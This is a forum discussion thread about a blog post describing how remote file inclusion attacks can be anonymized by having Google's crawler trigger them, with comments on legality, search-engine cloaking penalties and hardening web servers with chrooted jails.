Anonymizing RFI Attacks Through Google

netbuzz writes "Noam Rathaus on his SecuriTeam blog describes a technique by which 'Google can be utilized to hack into websites — actively exploiting them (not information gathering by the use of "Google hacking," although that is how most of the sites vulnerable to RFI attacks are found).' He cites examples in the wild and even mentions that the technique could be used as a 'covert' communications channel."

but is it a crime...

[Sensor]

There is actually quite an interesting aside to this, would someone who used this technique actually be guilty of hacking? Afterall they don't run the exploit and arguably can't guarentee that anyone will.

If I happen to create a utility capable of cracking a site but then store it for research, never distribute and never actively use then I've not committed a crime. If I distribute it to other researchers in good faith then I'm covered - at present its only the person who actively uses it that is guilty of a crime.

However, in this scenario (even if I could be traced) its arguable that *I* never attacked a site, all I did was to place a tool that could be used in that way in a public location. I'm not sure that would completely stand up given the recent ammendment to the UKs computer misuse act (i.e. reasonable belief that the tool would not be used in that fashion), but still...

As always it comes down to people...

PS:
Aas an aside I am currently running a survey for my MSc dissertation on IT admin access to confidential information. If you'd like to help out (and would like a shot at winning a £25 or $40 amazon voucher) then please take a look at:

https://msc-survery.priogenus.com/amazon.php

Re:but is it a crime...

[MartinJW]

I'm not so sure. The intent is there to commit the crime, and it's safe to assume that once the attack has taken place, the malicious user will be utilising the now open security hole for further ends. I guess it's a bit like getting a friend to kill someone - you would still be guilty of murder - wouldn't you?

Re:but is it a crime...

[Sensor]

Technically "conspiracy to murder", but could you prove the case if you left a note in your "private" diary that you thought someone could be killed in a certain fashion... and someone then read your diary and chose to act upon it?

Re:change behaviour for bots

If you do that, prepare to be delisted from search engines or at least severely downranked. Showing different pages to bots than to regular clients is called cloaking and, since it is a technique primarily used to spam search engines, the major search engines test for cloaking and punish it. Technically a page is addressed by the URL, cookies, user agent, referrer and other pieces of request information, but search engines expect that you deliver the same main content for the same URL, all other request data be damned.

Re:How not Who

[deryckh]

Agreed. The problem I have with these sorts of things is they act as if the problem is with Google. It's not (or any other search engine for that matter). The problem is with the site that is vulnerable. Fix the security hole and there's nothing to worry about.

Simple solution

[vivekg]

Seriously, I hate to read article like this one. They don't offer any solution.....this kind of attacks are not new at all, you can find tons of such attacks from access.log file/p> tail -f /var/log/httpd/access.log

First get rid of fat apache and use like small and secure lighttpd if you are running a *small personal* web site. Second put lighttpd / Apache in chrooted jail and no one can install *php/perl* shell. I have documented the procedure for putting lighttpd in jail:

http://www.cyberciti.biz/tips/howto-setup-lighttpd -php-mysql-chrooted-jail.html

Both yahoo and google runs entire webserver in chrooted jail. Other choice is use OpenBSD which runs Apache in chrooted jail out of box.